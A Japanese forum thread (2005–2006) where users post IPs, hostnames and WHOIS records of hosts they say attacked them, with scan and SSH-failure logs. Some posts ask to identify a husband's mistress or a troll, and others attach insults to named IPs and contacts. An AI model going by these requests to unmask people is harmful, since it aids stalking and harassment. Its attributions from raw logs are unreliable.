これには激しく同意
379名無しさん@お腹いっぱい。:2005/12/29(木) 15:49:56
2名様ご案内♪
220.87.24.82(KR)
200.14.96.57(CL)

[02:33:55] <220.87.24.82> (213,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/awstats/awstats.pl
[02:33:55] <220.87.24.82> (205,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/awstats.pl
[02:33:56] <220.87.24.82> (201,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi/awstats.pl
[02:33:56] <220.87.24.82> (205,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /awstats/awstats.pl
[02:33:56] <220.87.24.82> (211,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/stats/awstats.pl
[02:33:57] <220.87.24.82> (203,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /stats/awstats.pl
[02:33:57] <220.87.24.82> (197,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /awstats.pl
[02:33:58] <220.87.24.82> (207,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi/stats/awstats.pl

[03:04:33] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:34] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:35] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:37] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:38] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:40] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
380名無しさん@お腹いっぱい。:2005/12/31(土) 17:10:00
あなたが検索されたアドレス[ 222.228.18.35 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.228.18.0/24
b. [ネットワーク名] V-FLETS
f. [組織名] グローバルソリューション株式会社
g. [Organization] Global Solution K.K.
m. [管理者連絡窓口] IH010JP
n. [技術連絡担当者] MA2355JP
p. [ネームサーバ] ns1.vectant.ne.jp
p. [ネームサーバ] ns2.vectant.ne.jp
[割当年月日] 2004/05/25
[最終更新] 2004/05/25 11:42:03(JST)

上位情報
----------
グローバルソリューション株式会社 (Global Solution K.K.)
[割り振り] 222.228.0.0/16

おたくさんのユーザーさんにはやんちゃものがいるようですね?
381名無しさん@お腹いっぱい。:2006/01/01(日) 07:36:41
sshを5秒に一回ペースでノックされていかれました。
221.135.33.92

・・・インド?鯖立て初心者の私は恐怖でガクブルです。
382名無しさん@お腹いっぱい。:2006/01/01(日) 09:45:39
195.39.35.48氏ね
383名無しさん@お腹いっぱい。:2006/01/01(日) 11:05:10
おまいらに頼みが;;
旦那が女つくって出ていった…
女の携帯アドレスから電話番号や名前を特定することって可能ですか?
お願いします
384名無しさん@お腹いっぱい。:2006/01/01(日) 11:19:33
210.81.153.192ってドコよ?
385名無しさん@お腹いっぱい。:2006/01/01(日) 11:22:11
>>383
離婚して俺と結婚しないか
386名無しさん@お腹いっぱい。:2006/01/01(日) 11:23:30
>>384
自己れす
210.81.153.192/5000
ttp://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040518/144341/
これか???
1秒間に10回来る。うざい。

387名無しさん@お腹いっぱい。:2006/01/02(月) 10:55:07
>>381
まず、/etc/hosts.{allow,deny}で閉めとく。Windowsなら分からん。
それから、
388名無しさん@お腹いっぱい。:2006/01/02(月) 13:39:09
IP:202.146.24.166
兵庫県明石市より、先ほど5分間にわたるNewTear攻撃が。
回数はおよそ30。

inetnum: 202.248.24.160 - 202.248.24.191
natname: JMD-NET
descr: JAPAN MUSIC DATA CO LTD.
389名無しさん@お腹いっぱい。:2006/01/02(月) 19:00:26
SMURF攻撃
IPアドレス 207.38.8.28
ホスト名 aphexmaster2.gamespy.com
IPアドレス割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
390名無しさん@お腹いっぱい。:2006/01/02(月) 19:23:26
IPアドレス 211.186.233.203
ホスト名 登録なし

[Querying whois.nic.or.kr]
[whois.nic.or.kr]


IPアドレス 211.133.63.152
ホスト名 ntgifu055152.gifu.nt.ftth.ppp.infoweb.ne.jp

ところで、>>389みたいな情報ってどこでわかるの?
391名無しさん@お腹いっぱい。:2006/01/02(月) 22:49:11
softbank219184048022.bbtec.net
392名無しさん@お腹いっぱい。:2006/01/03(火) 01:43:59
219.122.18.191 (c018-191.intsurf.ne.jp)
/p2/read.php漁り乙w
393名無しさん@お腹いっぱい。:2006/01/03(火) 11:34:10
[07:06:28] <210.206.137.4> (208,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cacti/graph_image.php

うちじゃ叩いても何も出ないよー
394名無しさん@お腹いっぱい。:2006/01/03(火) 21:54:07
222.15.110.69

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.15.110.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2004/09/30
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 222.12.0.0/14

ぼかー、トロイには感染しておりませぬ。
395名無しさん@お腹いっぱい。:2006/01/03(火) 22:17:30
226.223.148.200
初めて侵入検知した

ノートン入れているんだけど
セキュリティ無効にしないとなぜかこの板にアクセスできない。
有効にすると「ページを表示できません」とでる
396名無しさん@お腹いっぱい。:2006/01/03(火) 22:51:44
>>395

【インターネットセキュリティ入れたら2ちゃんに書き込めない場合】
 1.インターネットセキュリティ起動。
 2.真ん中あたりの「プライバシー制御」をクリック。
 3.右下あたりの「拡張」クリック。
 4.左下の「サイトを追加」をクリック。
 5.WWW.を消して「2ch.net」と文字を入れる。
 6.左上デフォルトのすぐ下に「2ch.net」と表示されるのでそれをクリック。
→青い反転文字になる。
 7.右半分の真ん中あたり「表示したサイトについての情報」欄,
「デフォルト設定を使う」のチェックをはずす。
 8.「許可」をクリック。
 9.あとはO.K O.K.
397名無しさん@お腹いっぱい。:2006/01/03(火) 23:37:06
inetnum: 218.222.104.0 - 218.222.127.255
netname: KDDI-NET
descr: DION (KDDI CORPORATION)
country: JP
admin-c: JP00000127
tech-c: JP00000181
398名無しさん@お腹いっぱい。:2006/01/03(火) 23:41:45
61.121.100.29
TCP SYN FLOOD攻撃を
2006/01/03 00:04:05 - 2006/01/03 22:18:26
に25回
ポートスキャンを
2006/01/03 22:14:02 - 2006/01/03 22:18:58
に12回も行っている。
何者なんだろ・・・

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.100.0/24
b. [ネットワーク名] NIFTY-SERVE
f. [組織名] ニフティサーブ ネットワーク(ニフティ株式会社)
g. [Organization] NIFTY SERVE NETWORK(NIFTY Corporation)
m. [管理者連絡窓口] YN006JP
n. [技術連絡担当者] KS1046JP
n. [技術連絡担当者] YN917JP
p. [ネームサーバ] ns0.nifty.ad.jp
p. [ネームサーバ] ns1.nifty.ad.jp
[割当年月日] 2001/07/16
[最終更新] 2001/07/16 22:32:02(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

下位情報
----------
該当するデータがありません。
399395:2006/01/04(水) 00:41:19
>>396
試したけどだめだった。
だけど>>395の不正アクセスしてきたIP制限解除したら
アクセスできなかった板にアクセスできるようになった。
とにかくありがとう。
400名無しさん@お腹いっぱい。:2006/01/04(水) 21:29:01
>>399
エクスプローラーで2ちゃん見てるなら専用ブラウザ入れた方がいいよ

乱立する2ch用ブラウザの比較 Part23
http://pc7.2ch.net/test/read.cgi/software/1127784246/

好きなの入れて。

あとこれも
【ノートン入れたら2chに書きこめない】人へ18
http://etc3.2ch.net/test/read.cgi/qa/1112631967/
401395:2006/01/04(水) 22:08:15
>>400
一番下のURLにアクセスしたら侵入検知が作動したんだけど。
206.223.150.175

これってどういうこと?
パソコン詳しくないから全くわからん。
402名無しさん@お腹いっぱい。:2006/01/04(水) 23:24:31
2chのプロキシー確認じゃないの?
403名無しさん@お腹いっぱい。:2006/01/04(水) 23:37:50
しつこいぞ
TCP SYN FLOOD攻撃
IPアドレス 218.64.186.131
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

何度やっても無駄だから
404名無しさん@お腹いっぱい。:2006/01/05(木) 00:03:56
mm-***-***-***-**.dialup.mgts.by
mm-***-***-***-**.adsl.mgts.by

年末年始に、
掲示板&ブログにスクリプトで書き込みしやがる。
405名無しさん@お腹いっぱい。:2006/01/05(木) 10:23:29
>>401
そこはメールアドレスに特定の文字列をいれるとノートン先生が反応するってスレ
で、その特定の文字列を、そのスレに書いたやつがいるから侵入検知が作動している。
406401:2006/01/05(木) 12:53:34
>>405
ありがとうございます
407名無しさん@お腹いっぱい。:2006/01/05(木) 17:03:51
IPアドレス 193.65.41.35
ホスト名 proxy2.lasipalatsi.fi
IPアドレス
割当国 ※ フィンランド (FI)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

まじウザい。そんな頻繁にやるな。
408名無しさん@お腹いっぱい。:2006/01/05(木) 23:31:08
64.237.38.118からSYN FLOOD、ポートスキャン頂いてます。
今日の21時から今までで

SYN FLOOD・・・948回
ポートスキャン3995回

キモスwwIP変えよ。
409名無しさん@お腹いっぱい。:2006/01/07(土) 00:54:08
125.192.65.120
FLH1Aba120.iba.mesh.ad.jp
410名無しさん@お腹いっぱい。:2006/01/07(土) 19:58:22
hosts.deny
ALL:中国
411名無しさん@お腹いっぱい。:2006/01/07(土) 23:30:32
70.37.42.73


Non-authoritative answer:
73.42.37.70.in-addr.arpa name = temecula-cuda1-70-37-42-73.ontrca.adelphia.net.

Authoritative answers can be found from:
42.37.70.in-addr.arpa nameserver = ns1.adelphia.net.
42.37.70.in-addr.arpa nameserver = ns2.adelphia.net.
42.37.70.in-addr.arpa nameserver = ns3.adelphia.net.
ns1.adelphia.net internet address = 24.50.78.2
ns2.adelphia.net internet address = 68.168.224.177
ns3.adelphia.net internet address = 68.168.192.17
412名無しさん@お腹いっぱい。:2006/01/07(土) 23:31:27
61.44.82.20


Non-authoritative answer:
20.82.44.61.in-addr.arpa name = 20.82.44.61.ap.seikyou.ne.jp.

Authoritative answers can be found from:
82.44.61.in-addr.arpa nameserver = NS1.FreeBit.NET.
82.44.61.in-addr.arpa nameserver = NS2.FreeBit.NET.
NS1.FreeBit.NET internet address = 210.143.144.11
NS2.FreeBit.NET internet address = 210.143.144.12
413名無しさん@お腹いっぱい。:2006/01/08(日) 11:22:54
61.152.199.195:80
414名無しさん@お腹いっぱい。:2006/01/08(日) 12:40:11
TCP SYN FLOOD攻撃 12.158.80.10 221.79.152.41 2006/01/08 12:02:55 - 2006/01/08 12:05:30 9
219.103.130.29 221.79.152.41 2006/01/08 11:09:51 - 2006/01/08 11:18:23 14
219.103.130.30 221.79.152.41 2006/01/08 11:09:51 - 2006/01/08 11:18:23 14
210.136.158.72 221.79.152.41 2006/01/08 10:20:48 - 2006/01/08 11:13:33 184
219.188.199.165 221.79.152.41 2006/01/08 03:39:49 - 2006/01/08 03:42:07 9
211.13.211.3 221.79.152.41 2006/01/08 03:35:56 - 2006/01/08 03:37:57 6
415名無しさん@お腹いっぱい。:2006/01/08(日) 13:35:04
 
416名無しさん@お腹いっぱい。:2006/01/08(日) 19:44:52
206.223.152.55
206.223.152.30

USから攻撃されてる。
417名無しさん@お腹いっぱい。:2006/01/08(日) 21:56:10
220.134.13.167(TW)
218.104.211.118(CN)

.csv形式の国別IPリストがあればいいんだけどねぇ
418名無しさん@お腹いっぱい。:2006/01/08(日) 22:39:59
219.108.40.29

今日はコレが一番多かった
419名無しさん@お腹いっぱい。:2006/01/09(月) 07:46:27
荒らしがアドレスを抜かれた。
でも懲りずにメチャクチャに荒らしを続けている。
なんとかできないものでしょうか。

459 2006/01/01 02:51:46 ID:2EoNwRdV   メイド達の大和 fi-202231173-49.urban.ne.jp

【ご主人様と】メイドさんでエロパロ【呼ばれたい】
http://sakura03.bbspink.com/test/read.cgi/eroparo/1116429800/
402,403,406-409,411,413,420,421,423,424-426,428,433-438,440,442,443,445,
454,459-462,464,470-475,477,485-490,492,502,517,525,533,539-540,555,559-565,
568-569,582-584,588,590-592,595-596

該当スレ
男が女に犯されるやつ
メイドさんでエロパロ
女性上位で優しく愛撫される小説ver4
兄弟を虐待する姉妹のSS 二日目
苺ましまろエロパロスレッド 苺2こ
ネット上の駄目なエロSS 第五章
少女が年上の男を弄ぶ作品PART4
シンジが女性キャラに虐められるSSスレ
女の子にいじめられる 
エロパロ板自治スレッド7


420名無しさん@お腹いっぱい。:2006/01/09(月) 11:23:19
誰か教えてください。
ログをとってたら
まったく身に覚えの無いアクセスがあります。
(うちのHPアドレスは家族しか知らないので)

 hinet-ip.hinet.net 台湾

ドメインがHINETで国籍が台湾みたいです。
これって、どういう方が
どういう意図で
どうやってアドレスを知って
みているのでしょうか?
初心者の私に教えてください。
421名無しさん@お腹いっぱい。:2006/01/09(月) 14:34:52
せんせえーー

220.148.7.213

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.148.0.0/18
b. [ネットワーク名] TOKAI-NET
f. [組織名] 株式会社ザ・トーカイ
g. [Organization] TOKAI CO.Ltd.
m. [管理者連絡窓口] MT7711JP
n. [技術連絡担当者] KK11421JP
n. [技術連絡担当者] MI5375JP
p. [ネームサーバ] dns0.tokai.or.jp
p. [ネームサーバ] dns1.tokai.or.jp
p. [ネームサーバ] dns2.tokai.or.jp
[割当年月日] 2003/11/18
[最終更新] 2003/11/18 09:42:08(JST)

上位情報
----------
株式会社ザ・トーカイ (TOKAI CO.Ltd.)
[割り振り] 220.148.0.0/16

この人がトロイを探し回って個人情報を盗もうとしています!!
つかまえてください!!
422名無しさん@お腹いっぱい。:2006/01/09(月) 14:56:27
61.172.250.36
423名無しさん@お腹いっぱい。:2006/01/09(月) 16:19:49
IPアドレス 61.126.193.61
から攻撃されたんだけど、どうにかなるんですか?
初めてで判らないから教えて下さい!!
424名無しさん@お腹いっぱい。:2006/01/09(月) 18:19:18
これはもう、ダメかもしれんね。
425名無しさん@お腹いっぱい。:2006/01/09(月) 20:48:04
203.168.117.197
426名無しさん@お腹いっぱい。:2006/01/10(火) 00:42:43
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.10.16.0/25
b. [ネットワーク名] CLARA
f. [組織名] 株式会社クララオンライン
g. [Organization] Clara Online, Inc.
m. [管理者連絡窓口] KI1054JP
n. [技術連絡担当者] KI1054JP
p. [ネームサーバ]
[割当年月日] 2000/08/18
[返却年月日]
[最終更新] 2000/08/18 19:54:04(JST)

上位情報
----------
ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.)
[割り振り] 211.10.16.0/20
ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.)
SUBA-113-016 [SUBA] 211.10.16.0/24

427名無しさん@お腹いっぱい。:2006/01/10(火) 00:43:16
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.231.163.0/24
b. [ネットワーク名] EACCESS
f. [組織名] イー・アクセス株式会社
g. [Organization] eAccess Co.,Ltd.
m. [管理者連絡窓口] YO1846JP
n. [技術連絡担当者] HO1626JP
p. [ネームサーバ] ns1.eaccess.ne.jp
p. [ネームサーバ] ns2.eaccess.ne.jp
[割当年月日] 2002/07/11
[返却年月日]
[最終更新] 2004/04/15 10:07:37(JST)

上位情報
----------
イー・アクセス株式会社 (eAccess Ltd.)
[割り振り] 218.231.128.0/17
428名無しさん@お腹いっぱい。:2006/01/10(火) 00:43:49
OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 207.46.0.0 - 207.46.255.255
CIDR: 207.46.0.0/16
NetName: MICROSOFT-GLOBAL-NET
NetHandle: NET-207-46-0-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Assignment
NameServer: NS1.MSFT.NET
NameServer: NS5.MSFT.NET
NameServer: NS2.MSFT.NET
NameServer: NS3.MSFT.NET
NameServer: NS4.MSFT.NET
Comment:
RegDate: 1997-03-31
Updated: 2004-12-09
429名無しさん@お腹いっぱい。:2006/01/10(火) 00:44:18
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.224.152.0/21
b. [ネットワーク名] PANANETIP
f. [組織名] パナソニック ネットワークサービシズ株式会社
g. [Organization] Panasonic Network Services Inc.
m. [管理者連絡窓口] HK10267JP
n. [技術連絡担当者] HO205JP
p. [ネームサーバ] dns0.pana.net
p. [ネームサーバ] dns1.pana.net
[割当年月日] 1999/03/03
[返却年月日]
[最終更新] 2004/05/07 10:16:25(JST)

上位情報
----------
パナソニック ネットワークサービシズ株式会社 (Panasonic Network Services Inc.)
[割り振り] 202.224.128.0/18
430名無しさん@お腹いっぱい。:2006/01/10(火) 04:49:34
126.64.94.129
softbank126064094129.bbtec.net

60.68.23.12
softbank060068023012.bbtec.net
431名無しさん@お腹いっぱい。:2006/01/10(火) 22:05:21
ライブチャットの動画画面をデスクトップ録画するってことは違法なんですかね?
それと、そういうのしてるとバレます??
432名無しさん@お腹いっぱい。:2006/01/10(火) 22:21:49
ライブチャットの動画画面をデスクトップ録画するってことは違法なんですかね?
それと、そういうのしてるとバレます??
433名無しさん@お腹いっぱい。:2006/01/10(火) 22:25:10
1、行為自体は合法、それをネットなどで公開すれば違法でFA
2、ばれません

2度カキコすな
434名無しさん@お腹いっぱい。:2006/01/11(水) 01:41:10
1、行為自体は合法、それをネットなどで公開すれば違法でFA
2、ばれません

2度カキコすな
435名無しさん@お腹いっぱい。:2006/01/12(木) 10:57:07
63.247.81.*
80.239.107.*
150.156.16.*
436名無しさん@お腹いっぱい。:2006/01/12(木) 12:39:40
kaniwww.city.kani.gifu.jp(210.172.197.20)
437名無しさん@お腹いっぱい。:2006/01/12(木) 23:29:29
SMURF攻撃
IPアドレス 207.38.8.27
ホスト名 aphexmaster1.gamespy.com
IPアドレス割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
438名無しさん@お腹いっぱい。:2006/01/12(木) 23:34:11
IP SPOOFING攻撃 from 192.168.83.47
439名無しさん@お腹いっぱい。:2006/01/13(金) 17:33:18
Jan 13 14:18:28 *** sshd[**]: Did not receive identification string from 219.163.129.92
Jan 13 14:24:07 *** sshd[**]: Illegal user library from 219.163.129.92
Jan 13 14:24:08 *** sshd[**]: Illegal user cyrus from 219.163.129.92

inetnum: 219.163.129.88 - 219.163.129.95
netname: NETXJAPNKK
descr: NetXposure Japan K.K.


440名無しさん@お腹いっぱい。:2006/01/13(金) 17:37:57
>>438
それは笑うところ?

441名無しさん@お腹いっぱい。:2006/01/13(金) 18:17:56
442名無しさん@お腹いっぱい。:2006/01/13(金) 22:36:47
NMap Xmas Scan攻撃って何すか?
443名無しさん@お腹いっぱい。:2006/01/14(土) 18:40:40
Did not receive identification string from 222.228.90.132

inetnum: 222.228.90.0 - 222.228.90.255
netname: V-FLETS
descr: グローバルソリューション株式会社
country: JP

444名無しさん@お腹いっぱい。:2006/01/15(日) 16:25:21
201.128.9.*
193.23.115.*

やれやれだな
445名無しさん@お腹いっぱい。:2006/01/15(日) 20:57:27
Jan 15 18:26:05 *** sshd[8924]: Did not receive identification string from 131.112.80.22
Jan 15 18:28:52 *** sshd[8933]: input_userauth_request: illegal user mata
Jan 15 18:28:52 *** sshd[8933]: Failed password for illegal user mata from 131.112.80.22 port 59283 ssh2
Jan 15 18:28:52 *** sshd[8933]: Received disconnect from 131.112.80.22: 11: Bye Bye
(略)
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 131.112.0.0/16
b. [ネットワーク名] TITANET
f. [組織名] 東京工業大学
g. [Organization] Tokyo Institute of Technology

東工大もやるなぁw
446名無しさん@お腹いっぱい。:2006/01/15(日) 23:03:35
221.188.128.46
p3046-ipad04fukui.fukui.ocn.ne.jp
202.70.215.85
flets-202-70-215-85.client.pikara.ne.jp
447名無しさん@お腹いっぱい。:2006/01/16(月) 02:05:32
210.141.112.163
448名無しさん@お腹いっぱい。:2006/01/16(月) 07:48:30
136.187.88.68
honiden-proj.ex.nii.ac.jp
f. [組織名] 国立情報学研究所
g. [Organization] National Institute of Informatics

やばい、国の機関に目つけられたw
449名無しさん@お腹いっぱい。:2006/01/16(月) 09:19:34
>>448
アダルトサーバーでも立てているのか?
450名無しさん@お腹いっぱい。:2006/01/16(月) 12:17:14
Jan 14 20:25:05 *** sshd[29532]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=dualpc0.iis.u-tokyo.ac.jp
東大

Jan 15 08:26:19 *** sshd[10402]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=219x123x39x114.ap219.ftth.ucom.ne.jp
EPIONTECH CO.,Ltd
451名無しさん@お腹いっぱい。:2006/01/16(月) 13:26:49
ENTE MILITARE ALLEATO USA/NATO-US NAVY NAPOL

えらいとこからきたw
452名無しさん@お腹いっぱい。:2006/01/16(月) 13:44:57
パソコン持って逃げろ
453名無しさん@お腹いっぱい。:2006/01/16(月) 13:51:42
85.37.190.232:8619 udp4
ENTE MILITARE ALLEATO USA/NATO-US NAVY

いや、おいら軍事に関わるものなんて何も持ってなし、とりたてて悪い事やってねーつーのw
軍と付くものといえば、ケロロ軍曹のDVDくらいしかないよ(´・ω・`)
454名無しさん@お腹いっぱい。:2006/01/16(月) 14:08:03
>>451
10分後には黒塗りの車がくるぞ
455名無しさん@お腹いっぱい。:2006/01/16(月) 14:13:53
エシュロン?
456名無しさん@お腹いっぱい。:2006/01/16(月) 14:22:34
219.102.54.134
445番ポート狙ってきてるんだが
457名無しさん@お腹いっぱい。:2006/01/16(月) 23:41:33
SMURF攻撃180回
2006/01/10 17:35:22 - 2006/01/16 15:33:13
IPアドレス 207.38.8.27
ホスト名 aphexmaster1.gamespy.com
IPアドレス割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
458名無しさん@お腹いっぱい。:2006/01/17(火) 00:23:00
エシュロンってなつかしいなw
459名無しさん@お腹いっぱい。:2006/01/18(水) 00:14:30
192.168.24.55:3067 等のローカルアドレスから、
家のサーバにpingでは無い不規則なアクセスログがよくある。
一人暮らしで、昼間は仕事でいない。
昼間に立ち上げてるのはそのサーバのみ。
その間、他にLANに繋がってる機器は無いはず。
無線LANは無いから外部からでは無いと思うんだが・・・。
どういった可能性がある?教えてエロい人。
460名無しさん@お腹いっぱい。:2006/01/18(水) 08:51:12
>>459
何が残したログだよ。
461名無しさん@お腹いっぱい。:2006/01/18(水) 20:42:03
IPアドレス 206.223.150.120
ホスト名 tiger505.maido3.com
IPアドレス
 割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

ノートン先生が騒いでおります。
462名無しさん@お腹いっぱい。:2006/01/18(水) 20:44:55
>>461
そこはIn,Outともに弾いたほうがいいよ
463名無しさん@お腹いっぱい。:2006/01/18(水) 20:50:24
>>462 さん
すみません。In,Outとはなんですか?
464名無しさん@お腹いっぱい。:2006/01/18(水) 21:19:16
>>462 さん
すみません。自己解決しました。
465名無しさん@お腹いっぱい。:2006/01/18(水) 22:14:29
>>461
これ2ちゃんの鯖やん?
466名無しさん@お腹いっぱい。:2006/01/18(水) 22:27:32
だから462が面白いんだろw
467名無しさん@お腹いっぱい。:2006/01/18(水) 23:48:28
ポートスキャン49回

IPアドレス 202.93.87.190
ホスト名 f32.mail.vip.bbt.yahoo.co.jp
IPアドレス割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

氏ね
468:2006/01/19(木) 15:24:17
すみませんがこのIP抜いてもらえますか?
この荒しは中傷激しいんです。
自分バカなもんでIP抜けないんですお。
222.7.56.143
おねがいします。
469名無しさん@お腹いっぱい。:2006/01/19(木) 16:03:56
バカとか初心者とか自分で言えば
不勉強の免罪符になるとでも思っているのかね?
バカだと思うならあきらめなさい
PHSだし
470名無しさん@お腹いっぱい。:2006/01/19(木) 16:25:09
>>467
お前ヤフーメール使うの禁止
471名無しさん@お腹いっぱい。:2006/01/19(木) 16:45:48
>>470
元々使ってないから書き込んだんだけど
472名無しさん@お腹いっぱい。:2006/01/20(金) 00:04:30
>>470
どう答える?
473名無しさん@お腹いっぱい。:2006/01/20(金) 00:07:42
Relaying denied:
From ip-209-172-61-87.reverse.privatedns.com[209.172.61.87]
to [email protected] : 1 Time(s)

こやつはsshアタックしてきたり、smtpアタックしてきたり。

常連ですか?
474名無しさん@お腹いっぱい。:2006/01/20(金) 01:25:09
ポート1026あたりの叩きがまた増えてきた
475名無しさん@お腹いっぱい。:2006/01/20(金) 03:37:29
218.222.164.94
逝ってヨシ
476名無しさん@お腹いっぱい。:2006/01/20(金) 08:23:11
ヤフーメールって使うとポートスキャンしてくるの?
何のために?
477名無しさん@お腹いっぱい。:2006/01/20(金) 08:46:42
>>470
ヤフーメールを使ってればポートスキャンされてもしかたない
と言う意味に取れるがそのへんのトコ>>476に答えてやれ

あとオマエが早とちりで使用禁止した>>471は使ってないのに
ポートスキャンされてるらしいのでコメントしてやれ
478名無しさん@お腹いっぱい。:2006/01/20(金) 11:18:00
CATVなんじゃね?
479名無しさん@お腹いっぱい。:2006/01/20(金) 11:53:37
みんなIP抜くのにどんなツール使っている?
480名無しさん@お腹いっぱい。:2006/01/20(金) 12:11:55
64.124.85.210.become.com
481名無しさん@お腹いっぱい。:2006/01/20(金) 12:29:33
>>479
apacheのログ。
482名無しさん@お腹いっぱい。:2006/01/20(金) 20:12:09
Domain Information: [ドメイン情報]
a. [ドメイン名] KDDI.NE.JP
b. [ねっとわーくさーびすめい] けーでぃーでぃーあい
c. [ネットワークサービス名] KDDI
d. [Network Service Name] KDDI
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] KT6192JP
n. [技術連絡担当者] SH1304JP
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns1.dion.ne.jp
[状態] Connected (2006/12/31)
[登録年月日] 1999/12/27
[接続年月日] 2000/10/02
[最終更新] 2006/01/01 01:18:21 (JST)
483名無しさん@お腹いっぱい。:2006/01/20(金) 20:34:31
IPアドレス 210.155.101.159
ホスト名 VV043000140128101155210031.gwrev.kddi.ne.j
 割当国 ※ 日本 (JP)


こいつしつこい。死ね。
484名無しさん@お腹いっぱい。:2006/01/20(金) 21:57:49
ccTLD国名検索�
�IPアドレス��61.121.9.87�
�ホスト名��nttyma031087.tyma.nt.ftth.ppp.infoweb.ne.jp�
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.0.0/18
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2000/12/12
[返却年月日]
[最終更新] 2003/11/07 11:47:32(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

下位情報
----------
該当するデータがありません。
485名無しさん@お腹いっぱい。:2006/01/21(土) 15:10:36
IPアドレス 210.173.169.161
ホスト名 www3.asahi.com
割当国 ※ 日本 (JP)

Registrant:
Asahi Shimbun Tsukiji Chuo-ku
Tokyo
No Valid City, No Valid State
JP

Domain Name: ASAHI.COM

Administrative Contact:
Oaawaa, akoto [email protected]
Asahi Shimbun Tsukiji
Chuo-ku, Tokyo 1048011
JP
+81-3-5541-8949 +81-3-5541-8687


なんだこれ('A`)
iia, ysue [email protected]
Asahi Shimbun
5-3-2 Tsukiji
Chuo-ku, Tokyo 1048011
JP
+81-3-5541-8949
486名無しさん@お腹いっぱい。:2006/01/22(日) 14:28:03
IPアドレス 210.159.238.64
ホスト名 PPPax814.kanagawa-ip.dti.ne.jp
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.159.208.0-210.159.255.255
b. [ネットワーク名] DTI-NET
f. [組織名] 株式会社 ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET INC.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MK10931JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2000/03/23
[返却年月日]
[最終更新] 2004/09/08 12:28:11(JST)
上位情報----------
株式会社 ドリーム・トレイン・インターネット (Dream Train Internet Inc.)
[割り振り] 210.159.128.0/17

こいつうざい
487名無しさん@お腹いっぱい。:2006/01/22(日) 17:19:04
IPアドレス 203.216.240.161
ホスト名 cs1.msg.tnz.yahoo.co.jp
IPアドレス
 割当国 ※ 日本 (JP)
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.216.224.0/19
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [管理者連絡窓口] TT9944JP
n. [技術連絡担当者] TT9944JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] ns10.yahoo.co.jp
[割当年月日] 2005/03/03
